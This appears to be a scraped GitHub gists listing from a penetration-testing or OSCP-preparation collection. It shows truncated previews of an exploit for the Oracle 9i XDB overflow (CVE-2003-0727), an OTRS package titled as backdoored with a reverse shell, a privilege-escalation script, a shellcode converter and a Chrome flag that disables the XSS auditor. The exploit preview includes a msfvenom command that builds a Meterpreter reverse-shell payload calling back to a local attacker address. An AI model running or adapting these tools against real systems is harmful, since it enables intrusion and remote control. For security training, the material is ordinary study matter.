- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
mgeeky
/ bin2shellcode.py
Last active
December 17, 2022 15:00
Binary blob to C-array simple converting script. Useful when embedding compiled binary shellcode within C program.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Disasm of 64-bit binary: | |
| # $ objdump -b binary -D -m i386:x86-64 <file> | |
| # | |
| # Usage: | |
| # $ ./bin2shellcode.py <file> num | |
| # Where: | |
| # num - number of bytes to convert into array. | |
| # `num` can be negative, resulting in `size-num` | |
| # bytes be converted. |
mgeeky
/ MyPackage.opm
Last active
July 18, 2024 14:35
OTRS OPM backdoored Package with Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" ?> | |
| <otrs_package version="1.1"> | |
| <Name>MyModule</Name> | |
| <Version>1.0.0</Version> | |
| <Vendor>My Module</Vendor> | |
| <URL>http://otrs.org/</URL> | |
| <License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License> | |
| <ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog> | |
| <Description Lang="en">MyModule</Description> | |
| <Framework>5.x.x</Framework> |
mbijon
/ disable-xss-auditor.sh
Created
September 19, 2016 19:04
CLI command to start Chrome with XSS Auditor disabled. Use for XSS/security testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' --disable-xss-auditor --enable-devtools-experiments --disable-features=enable-automatic-password-saving |
hinchley
/ UserWritableLocations.ps1
Created
September 12, 2016 09:35
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article: http://hinchley.net/2016/06/13/an-approach-for-managing-microsoft-applocker-policies/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Paths that we've already excluded via AppLocker. | |
| $exclusions = @() | |
| # Paths to process. | |
| $paths = @( | |
| "C:\Windows" | |
| ) | |
| # Setup log. | |
| $log = "$PSScriptRoot\UserWritableLocations.log" |
mgeeky
/ exp2003-0727.py
Last active
August 1, 2018 00:40
CVE-2003-0727 Oracle 9i XDB HTTP Server Authentication PASS stack-based buffer overflow
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import struct | |
| import socket | |
| import base64 | |
| import time | |
| HOST = '192.168.0.11:8080' | |
| # | |
| # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4448 -e x86/shikata_ga_nai --smallest -f py -v shellcode |
unfo
/ how-to-oscp-final.md
Last active
June 22, 2025 19:49
gbaman
/ HowToOTGFast.md
Last active
July 9, 2025 19:34
Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!
More details - http://blog.gbaman.info/?p=791
For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).
1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.
2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc) and add to the bottom of the config.txt file dtoverlay=dwc2 on a new line, then save the file.
3. If using a recent release of Jessie (Dec 2016 onwards), then create a new file simply called ssh in the SD card as well. By default SSH i
1N3
/ LinuxPrivEsc.sh
Created
May 13, 2016 02:50
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # `7MN. `7MF' | |
| # __, MMN. M | |
| #`7MM M YMb M pd""b. | |
| # MM M `MN. M (O) `8b | |
| # MM M `MM.M ,89 | |
| # MM M YMM ""Yb. | |
| #.JMML..JML. YM 88 | |
| # (O) .M' |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.